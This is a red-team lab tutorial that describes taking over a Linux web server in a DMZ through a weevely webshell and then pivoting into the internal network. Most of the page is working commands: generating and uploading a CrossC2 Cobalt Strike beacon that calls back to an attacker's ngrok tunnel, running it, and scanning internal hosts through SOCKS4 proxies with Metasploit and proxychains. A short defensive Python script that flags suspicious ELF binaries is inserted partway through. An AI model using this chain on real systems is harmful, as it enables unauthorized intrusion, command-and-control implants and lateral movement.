# Pivoting DMZ: weevely + ngrok + CS Pivot COMBO via Linux

In this lab, we will see how to use a simple webshell to deploy a Cobalt Strike beacon on a Linux target exposed in a DMZ and then use that machine to pivot into the internal network. This is a common scenario in my red teaming assessments, for instance, when I find a flaw that permits uploading a webshell to the web server. Let's do it.

## Webshell - weevely

I often use weevely to deploy my webshell remotely. More information about this tool [**here**](https://gitbook.seguranca-informatica.pt/cheat-sheet-1/stuff/pivoting#pivoting-with-weevely-via-webshell).

```bash
weevely generate <password> <path>
weevely <URL> <password> [cmd]
```

Example of how to access the target machine:

```bash
kali:> weevely http://target_system/evil.php my@password

[+] weevely 4.0.1

[+] Target:     target:/tmp
[+] Session:    /home/kali/.weevely/sessions/target/...
[+] Shell:      System shell

[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.

weevely> 
target:/tmp $ 
```

At this point, we have a remote connection to the target server. It's time to prepare ngrok and the Cobalt Strike beacon so that we can pivot into the internal network from our localhost connection.

## [ngrok](https://ngrok.com/)

In this step, you can use a trusted machine (e.g., an EC2 instance on AWS) or simply ngrok. ngrok is a very useful tool that exposes a localhost server through any NAT or firewall, masquerading our public IP address along the way, of course :nerd:

{% embed url="https://gitbook.seguranca-informatica.pt/cheat-sheet-1/stuff/pivoting#ngrok" %}

We can use a configuration file as described in the link above, or simply run the following command to start a new TCP tunnel to local port 8083:

```bash
./ngrok tcp 8083
```

Now, it's time to create the Cobalt Strike stager.

![](https://4052868066-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MWd-VcvRHVgUtkahm85%2F-MXTRQwwMthxb8iLWyJy%2F-MXTUEx0rH_RPSBe3peS%2Fimage.png?alt=media\&token=be22fb6a-c30f-4983-a703-6777e2adac73)

## [**CrossC2** ](https://github.com/gloxec/CrossC2)

The CrossC2 framework allows us to generate cross-platform Cobalt Strike payloads, e.g., Linux x64 and x86 beacons.

We can create an x64 or x86 payload depending on the target system architecture.

**Tip**: use the `uname -a` command to check the target kernel and architecture.

* **ngrok_ip**: The resolved IP address of the ngrok address.
* **ngrok_port**: The port assigned to the ngrok address.

```bash
# x86 beacon
./genCrossC2.Linux ngrok_ip ngrok_port .cobaltstrike.beacon_keys null Linux x86 ./cross
# x64 beacon
./genCrossC2.Linux ngrok_ip ngrok_port .cobaltstrike.beacon_keys null Linux x64 ./cross
```

![](https://4052868066-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MWd-VcvRHVgUtkahm85%2F-MXTRQwwMthxb8iLWyJy%2F-MXTV6YyQ2GmAFaxMNwH%2Fimage.png?alt=media\&token=d81cfcc0-ea26-491b-b70b-37449dc4cded)

The x64 payload was generated, and we can verify it with the ***file*** command:

```bash
kali@kali:~/Desktop$ file cross
cross: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, no section header
```
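From the defender's side, the properties that ***file*** reports above (statically linked, no section header table) are cheap to check programmatically when triaging unexpected executables in directories such as `/tmp`. The following Python script is an added example, not part of the original page: it parses the ELF header and program headers and flags that profile; the sample ELF bytes are constructed inline for testing.

```python
import struct

ET_EXEC = 2     # e_type: standalone executable
PT_INTERP = 3   # program header naming the dynamic loader (absent when static)

def elf_profile(data: bytes) -> dict:
    """Return the header facts a triage script cares about."""
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    is64 = data[4] == 2                       # EI_CLASS: 2 = ELF64
    end = "<" if data[5] == 1 else ">"        # EI_DATA: 1 = little endian
    fmt = end + ("HHIQQQIHHHHHH" if is64 else "HHIIIIIHHHHHH")
    (e_type, e_machine, _, _, e_phoff, e_shoff, _, _,
     e_phentsize, e_phnum, _, e_shnum, _) = struct.unpack_from(fmt, data, 16)
    # p_type is the first 4 bytes of every program header in both ELF classes
    ptypes = [struct.unpack_from(end + "I", data, e_phoff + i * e_phentsize)[0]
              for i in range(e_phnum)]
    return {
        "bits": 64 if is64 else 32,
        "machine": e_machine,                 # 0x3E = x86-64
        "executable": e_type == ET_EXEC,
        "static": PT_INTERP not in ptypes,    # no loader requested
        "no_section_header": e_shoff == 0 and e_shnum == 0,
    }

def matches_beacon_profile(data: bytes) -> bool:
    """True for the combination reported above: statically linked executable
    with the section header table stripped entirely."""
    p = elf_profile(data)
    return p["executable"] and p["static"] and p["no_section_header"]

def build_elf64(ph_types, shnum):
    """Constructed ELF64 header plus program headers (test data, not a real binary)."""
    ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + b"\x00" * 8   # 64-bit, LE, v1
    phoff, phentsize = 64, 56
    shoff = 0 if shnum == 0 else phoff + phentsize * len(ph_types)
    hdr = struct.pack("<HHIQQQIHHHHHH", ET_EXEC, 0x3E, 1, 0x401000, phoff, shoff,
                      0, 64, phentsize, len(ph_types), 64, shnum, 0)
    phdrs = b"".join(struct.pack("<IIQQQQQQ", t, 5, 0, 0, 0, 0, 0, 0x1000)
                     for t in ph_types)
    return ident + hdr + phdrs

# Constructed samples: header-stripped static binary vs. a normal dynamic one
STRIPPED_STATIC = build_elf64([1, 1], shnum=0)             # PT_LOAD x2, no sections
NORMAL_DYNAMIC = build_elf64([1, PT_INTERP, 1], shnum=12)  # has PT_INTERP + sections

if __name__ == "__main__":
    for name, blob in (("stripped_static", STRIPPED_STATIC), ("normal_dynamic", NORMAL_DYNAMIC)):
        print(name, "FLAG" if matches_beacon_profile(blob) else "ok", elf_profile(blob))
```

Run it against real files by passing `open(path, "rb").read()` to `matches_beacon_profile`; a hit is a triage lead, not proof, since some legitimate static tools share the profile.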

Now, it's time to upload it to the target Linux web server using weevely:

```bash
target:/tmp $ :file_upload /home/kali/Desktop/cross /tmp/cross
True
target:/tmp $
target:/tmp $ chmod +x cross
```

## Create CS Listener

The next step is to create the CS listener. We need to set our internal IP address in:

* **HTTPS HOSTS**
* **HTTPS HOST (STAGER)**

and the local port (8083) to which the ngrok connection is mapped in **HTTPS PORT (C2)**.

![](https://4052868066-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MWd-VcvRHVgUtkahm85%2F-MXTRQwwMthxb8iLWyJy%2F-MXTXOyqkDn3wqTBFMDs%2Fimage.png?alt=media\&token=a8fea78f-d60e-4d71-a3b3-fa4cd56482f0)

After that, the payload can be executed from the weevely webshell:

```bash
./cross
```

And yeah, we got it :sunglasses:

![](https://4052868066-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MWd-VcvRHVgUtkahm85%2F-MXTRQwwMthxb8iLWyJy%2F-MXTYRF6g-ba7TC3ZVym%2Fimage.png?alt=media\&token=d05cae06-8a54-45da-99f6-d03f268c8bcd)

## Pivoting using CS

In the next phase, we will:

* **Create a SOCKS4 proxy**
* **Use Metasploit to pivot internally;** or
* **Take advantage of the proxychains tool** (my favorite approach) :space_invader:

When interacting with the new beacon, you have the following options:

![Socks commands were highlighted.](https://4052868066-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MWd-VcvRHVgUtkahm85%2F-MXTRQwwMthxb8iLWyJy%2F-MXT_M-TuzI8-drlLwXl%2Fimage.png?alt=media\&token=afd5909d-98ac-451a-af89-4c9161042587)

We can create the new SOCKS proxy from the CS console, or by clicking on the target machine.

![](https://4052868066-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MWd-VcvRHVgUtkahm85%2F-MXTRQwwMthxb8iLWyJy%2F-MXT_t5o9hI81TCRPROf%2Fimage.png?alt=media\&token=c5e958e8-5fc7-438c-b666-26f7233eccc6)

![](https://4052868066-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MWd-VcvRHVgUtkahm85%2F-MXTRQwwMthxb8iLWyJy%2F-MXT_xdU4L3Ka-gA6EYB%2Fimage.png?alt=media\&token=78b59cfe-d48a-4e09-8ce3-0874600edc3f)

After clicking the **Launch** button, the SOCKS listener is created on the local (attacker) machine. We can confirm it with the following command:

```bash
netstat -antp | grep "LISTEN"
(...)
tcp6       0      0 :::14833                :::*                    LISTEN
```

### Metasploit for pivoting internally

From the **Proxy Pivots** menu, we can copy the command to pivot through MSF.

![](https://4052868066-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MWd-VcvRHVgUtkahm85%2F-MXTRQwwMthxb8iLWyJy%2F-MXTb4qREpCcmECs1YwE%2Fimage.png?alt=media\&token=8e8cf382-becf-4fd0-82c8-16b2556d0e17)

With that command in hand, we can start msfconsole, paste it to set up the new tunnel, and scan the hosts available on the internal network.

```bash
msfconsole
# route all module traffic through the SOCKS4 listener created by Cobalt Strike
setg Proxies socks4:10.0.2.15:14833
use auxiliary/scanner/smb/smb_version
# msfconsole 'set' takes "NAME VALUE", not "NAME=VALUE"
set RHOSTS 192.168.0.0/24
run
```

### **Take advantage of the proxychains tool**

To use proxychains, we first need to add the new SOCKS proxy to the ***/etc/proxychains.conf*** file.

```bash
sudo vim /etc/proxychains.conf
# append this line to the [ProxyList] section of the file:
socks4 10.0.2.15 14833
```

After that, we can use many tools, such as crackmapexec, nmap, the impacket tools, and so on, by prefixing them with proxychains:

```bash
proxychains nc 192.168.x.x 445 -v
```

## Bonus

**Creating a random Cobalt Strike C2 profile**

{% embed url="https://github.com/threatexpress/random_c2_profile?s=09" %}

**Cobalt Strike Malleable C2 profiles**

{% embed url="https://github.com/xx0hcd/Malleable-C2-Profiles" %}

## References

{% embed url="https://blog.cobaltstrike.com/2016/06/01/howto-port-forwards-through-a-socks-proxy/" %}

{% embed url="https://wh0ale.github.io/2019/12/11/VulnStack%E5%9F%9F%E7%8E%AF%E5%A2%83%E9%9D%B6%E5%9C%BA%E6%B8%97%E9%80%8F/" %}
